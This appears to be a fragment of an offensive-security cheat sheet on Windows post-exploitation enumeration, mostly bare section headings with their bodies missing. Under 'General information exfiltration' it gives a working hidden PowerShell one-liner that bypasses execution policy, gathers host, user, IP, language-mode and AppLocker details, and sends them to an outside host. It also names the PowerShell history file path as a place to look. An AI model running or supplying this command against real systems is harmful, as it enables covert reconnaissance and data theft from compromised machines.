Windows
Introduction
General information exfiltration
C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -exec bypass -nop -w hidden -c iwr -UseBasicParsing -Uri "http://10.10.10.4/index.html?h=$(hostname)?x64=$([Environment]::Is64BitProcess)?u=$($env:USERNAME)?cd=$(Get-Location)?ip=$((Test-Connection -ComputerName (hostname) -Count 1).IPV4Address.IPAddressToString)?clm=$($ExecutionContext.SessionState.LanguageMode)?AppLockerS=$(Get-Service -Name "AppIDSvc" | Select-Object -ExpandProperty Status)?AppLockerR=$(Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollectionTypes| Format-List| Out-String)"PowerShell History
c:\\Users\\<USER>\\AppData\\Roaming\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txtUser and group enumeration
whoami
echo %username%Privileges
whoami /allGroups
Operative system
Network enumeration
Constrained Language Enabled (CLM)
AMSI
AppLocker
Files Enumeration
PowerShell History
Disks
Alternate Data Streams
Permissions
Simple Rights
Mask
Permission
Specific Rights
Mask
Permission
Inheritance righsts (Applied only to directories)
Mask
Permission
Service rights
Mask
Permission
Meaning
List Installed HotFixes
Running processes
Scheduled Tasks
Last updated